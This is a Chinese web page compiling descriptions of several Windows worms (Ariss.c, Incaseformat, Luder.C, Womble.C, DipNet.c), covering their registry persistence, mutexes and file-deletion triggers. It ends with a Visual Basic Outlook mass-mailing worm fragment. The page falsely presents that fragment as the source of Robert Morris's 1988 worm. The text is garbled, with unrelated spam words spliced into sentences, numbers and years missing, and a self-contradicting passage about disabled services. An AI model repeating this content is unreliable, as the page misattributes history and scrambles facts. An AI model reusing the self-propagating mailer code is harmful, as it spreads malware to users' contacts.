1.Worm.Ariss.c病毒简介
2.关于Incaseformat蠕虫病毒的蠕虫超详细版分析
3.蠕虫病毒Win32.Luder.C感染方式
4.蠕虫病毒Win32.Womble.C简介
5.Worm.DipNet.c病毒行为
6.1988年RobertMorris释放的首个蠕虫病毒的源代码
Worm.Ariss.c病毒简介
Worm.Ariss.c是一款通过电子邮件进行传播的恶性蠕虫病毒,它具有破坏性,码蠕码能够削弱用户的虫代计算机防护。首先,蠕虫病毒会干扰用户的码蠕码防护系统,如关闭防火墙和常见的虫代舵机pid源码反病毒软件,以削弱计算机的蠕虫防护能力。它还会禁用注册表编辑器,码蠕码进一步限制用户的虫代系统管理权限。
病毒的蠕虫恶意行为包括但不限于禁用开始菜单中的"运行"功能,隐藏硬盘分区,码蠕码阻止用户进入Windows 的虫代MS-DOS模式,以及阻止显示"远程管理"等功能,蠕虫这些操作旨在创造一个更适合其他恶意软件入侵的码蠕码环境。此外,虫代病毒还会对系统中那些对于攻击者来说可能存在的、但对用户来说并无明显作用的服务进行关闭或删除。
这些不必要的服务通常在操作系统中默认安装,为潜在的黑客提供了便利。通过移除它们,可以大大降低系统遭受攻击的风险。总的来说,Worm.Ariss.c病毒对用户的粤语屋源码计算机安全构成严重威胁,用户应保持警惕并及时采取安全措施以防止其侵害。
关于Incaseformat蠕虫病毒的超详细版分析
背 景
年1月日,Incaseformat蠕虫病毒在全球范围内爆发,引发了广泛关注。华云安公司迅速确认了该病毒事件,并对其进行了深入分析。
Incaseformat蠕虫病毒自发现至今已有十多年历史,通常通过U盘传播,不具备网络传播能力。该病毒会遍历并删除除系统盘以外的所有文件,并在根目录下创建名为incaseformat.log的空文件。病毒代码中存在变量值设置错误,导致系统时间计算出错,直至年1月日病毒才被触发。
样本概况
样本名称:tsay.exe、ttry.exe
是否加壳:未加壳
MD5值:4BFEBFAA9DEA
SHA1值:ACADCF2E4FA6B6AE5C3C
CRC:E3EA9
测试环境:Win7(位)
行为分析
静态分析
病毒样本伪装成文件夹,实际上是一个可执行文件。用户误将之视为文件夹双击打开时,病毒得以成功执行。
通过PEid验证,确认该程序由Delphi编译,未进行加壳处理。源码安装nmap
查看区段表,发现存在CODE段,进一步确认了其为Delphi编译的程序。
动态分析
病毒首先将自身拷贝至C盘Windows目录下。
创建注册表自启动项。
病毒在电脑重启后启动tsay.exe,复制副本C:\Windows\ttry.exe,并执行。
ttry.exe执行清除逻辑,删除除系统盘外的所有磁盘文件。同时复制自身至除系统分区以外的所有分区根目录,并实时监控分区下的新建或已存在文件夹,将其隐藏。病毒复制自身,并以文件夹名称命名。
病毒还会强行篡改注册表,导致“显示系统隐藏文件”及“显示文件扩展名”功能失效。
涉及的注册表项包括:
测试结果显示,源文件夹不会立即删除,而是被隐藏,“显示系统隐藏文件”功能失效。
病毒只有在特定时间条件下才会遍历删除系统盘符外的修改kafka源码所有文件。具体时间设置为年(0x7D9)年3月以后,每月的1号、号、号、号执行删除指令。
详细分析
通过关键字符串定位关键函数0xEFB0。
使用IDA进行跳转分析关键函数。
程序首先判断文件是否存在,如不存在,则拷贝文件至C:\\windows\\tasy.exe。
随后打开并修改注册表。
启动后,程序判断自身文件路径是否为"C:\windows\tsay.exe"或"C:\windows\ttry.exe",当路径为"C:\windows\ttry.exe"时执行下一步。
在删除文件的主逻辑中,程序通过前缀路径*.*匹配所有文件名,然后递归删除文件。
通过交叉引用,跳转至父函数可发现只有在满足特定日期条件时才会执行删除操作。
由于调用的函数“Sysutils::DateTimeToTimeStamp”中dword_变量值错误设置为“5ACC4h(ms)”,导致时间戳计算错误,最终触发日的新暗堡源码文件删除行为。
解决方案
由于该病毒仅在Windows平台上执行删除文件操作,重启会导致病毒自启动。因此,建议采取以下措施:
1、立即在设备被感染后避免重启;
2、进行全面杀毒,并修复注册表;
3、禁止U盘自启动;
4、如果文件已被删除,应立即断电,使用数据恢复软件尝试恢复数据。
蠕虫病毒Win.Luder.C感染方式
当Win.Luder.C蠕虫病毒运行时,它首先将自身副本wservice.exe复制到系统的%System%目录,并设置该文件的隐藏属性。这样做的目的是为了在不被察觉的情况下隐藏其存在。接着,病毒会修改两个关键的注册表键值: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UpdateService 被设置为 "%System%\wservice.exe",这是确保病毒在系统启动时自动启动的行为。同样,HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateService 也被修改,目的是在用户登录时执行病毒副本。 为了进一步防止多个蠕虫副本同时运行,Win.Luder.C创建了一个名为"Kusyyyy"的互斥体,这是一种同步机制,确保单个实例的执行。这个互斥体的存在确保了病毒的自我复制和传播过程不会因多个实例同时运行而产生冲突。 值得注意的是,%System%是一个动态路径,病毒会根据操作系统环境来确定实际的系统文件夹位置。在Windows 和NT上,它默认位于C:\Winnt\System;而在Windows 、和ME中,路径是C:\Windows\System;而对于Windows XP,这个位置则是C:\Windows\System。扩展资料
Win/Luder.C是一种通过邮件传播的蠕虫,并寄存在PE 文件和RAR 文件中进行传播。另外,它还会生成一个特洛伊,用来下载并运行其它的恶意程序。它是大小为, 字节,以 UPX格式加壳的Win可运行程序。蠕虫病毒Win.Womble.C简介
蠕虫病毒Win.Womble.C,也被称为Email-Worm.Win.Womble.c(由Kaspersky识别)、W.Womble.A@mm(Symantec)、W/Womble.B(F-Secure)、WORM_WOMBLE.C(Trend)、W/Womble@MM(McAfee)以及W/Womble-A(Sophos),是一种特定类型的电脑病毒。它属于蠕虫类别,这意味着它能自我复制并通过网络进行传播,而无需用户的直接操作。 尽管蠕虫Win.Womble.C被标记为低危害性,但它的流行程度属于中等,这表明它在某些时期可能对用户的计算机系统构成了一定程度的威胁。这种病毒的主要特性在于其根kit功能。根kit是一种高级恶意软件,它能让病毒隐藏自身,躲避常规的安全检测工具,从而更难以被发现和移除。根kit功能允许Win.Womble.C在用户的系统中隐藏行踪,可能进行诸如窃取敏感信息、破坏数据或者为其他恶意活动提供便利等操作。 因此,对于任何用户来说,防范这种蠕虫病毒是必要的,应定期更新防病毒软件,避免打开未知来源的邮件附件,以减少被感染的风险。一旦发现电脑有异常行为,应立即进行系统扫描并清除潜在威胁。扩展资料
Win/Womble.C是一种发送大量邮件的蠕虫,可能是一个可运行程序,也可能是一个Windows Media文件,攻击MS-漏洞。病毒还可能通过网络共享进行复制,并周期性的下载任意文件,在被感染机器上运行。Worm.DipNet.c病毒行为
该蠕虫病毒Worm.DipNet.c主要通过系统漏洞进行传播,其行为特征包括以下几点:
首先,病毒会在系统目录下创建三个随机命名的副本,并将它们注册为系统服务NetDDEfipx,以实现自我复制。每个副本的文件名都具有随机性,增加了其隐藏和躲避检测的能力。
为了防止病毒的多实例同时运行,它会建立一个互斥体_XXX_asdasd_XXX__,以此进行资源控制。
其次,病毒会在注册表中添加启动项,具体在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中,将启动命令设置为指向随机生成的exe文件,确保病毒在系统启动时自动运行。
更进一步,病毒将自身注册为系统服务,通过以下注册表键值进行配置:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDEfipx。它设置了服务类型、启动方式、错误控制等参数,并将服务对象名设为LocalSystem,确保病毒在系统后台运行。
病毒还会在系统设备树中创建相关项,如HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\ENUM\ROOT\LEGACY_NETDDEFIPX等,以确保服务的正常运行和新实例的管理。
总的来说,Worm.DipNet.c病毒通过系统服务和启动项的巧妙设置,实现了自我复制和隐蔽运行,对网络服务器的安全构成严重威胁。其复杂的行为模式使其更难以防范和清除。
年RobertMorris释放的首个蠕虫病毒的源代码
在年,Robert Morris释放了首个蠕虫病毒,其源代码的片段如下:
```vb
Sub Main()
'TaskVisible。App.TaskVisible = False
On Error Resume Next
Dim Location, Location2, DesLocation, DesLocation2
Location = App.Path & "\" & App.EXEName & "肢扮.exe"
Location2 = App.Path & App.EXEName & ".exe"
DesLocation = "C:\WINDOWS\SYSTEM\WinMapi.exe"
DesLocation2 = "C:\WINNT\SYSTEM\镇迟Mapi.exe"
FileCopy Location, DesLocation
FileCopy Location2, DesLocation
FileCopy Location, DesLocation2
FileCopy Location2, DesLocation2
Dim Var1, FilePath, FileName, FullLocation, MyApp
Dim Christmas, List, AddList, AddressListCount
Dim Merry, AdEntries, Attachs, Msg
Var1 = "True"
FilePath = App.Path
FileName = App.EXEName
FullLocation = FilePath & "\" & FileName
Set MyApp = CreateObject("Outlook.Application")
If MyApp = "Outlook" Then
Set Christmas = MyApp.GetNameSpace("mapi")
Set List = Christmas.AddressLists
For Each Addresslist In List
If Addresslist.AddressEntries.Count > 0 Then
AddressListCount = Addresslist.AddressEntries.Count
For AddList = 1 To AddressListCount
Set Merry = MyApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
Merry.To = AdEntries.Address
Merry.Subject = Merry.Body
Set Attachs = Merry.Attachments
Attachs.Add FullLocation
If Var1 = "true" Then
Merry.DeleteAfterSubmit = True
End If
If Msg.To > "" Then
Merry.Send
End If
Next
Beep
End If
Next
End If
Dim RegSet
Set RegSet = CreateObject("wscript.shell")
'reg.regwrite "HEKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\MAPI", "C:\WINNT\SYSTEM\MAPI.EXE"
'reg.regwrite "HEKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\winMAPI", "C:\WINNT\SYSTEM\winMAPI.EXE"
End Sub
```
请注意,由于蠕虫病毒是恶意软件,其传播和操作可能导致严重的安全风险。这段代码仅供教育和研究目的,绝不应在实际环境中运行。
c:\system volume information\-restore{ b2-fa-.......}是蠕虫病毒吗?
应该不是。应该是系统文件。蠕虫病毒一般以worm为后缀当然也不排除病毒已经伪装了。如果不放心还是用杀毒软件查杀下。一般最新的卡巴斯基对蠕虫病毒的查杀能力比较强。只要能查出来就能杀掉。杀不掉的开机时按F8进安全模式再拿杀毒软件杀一定能杀掉。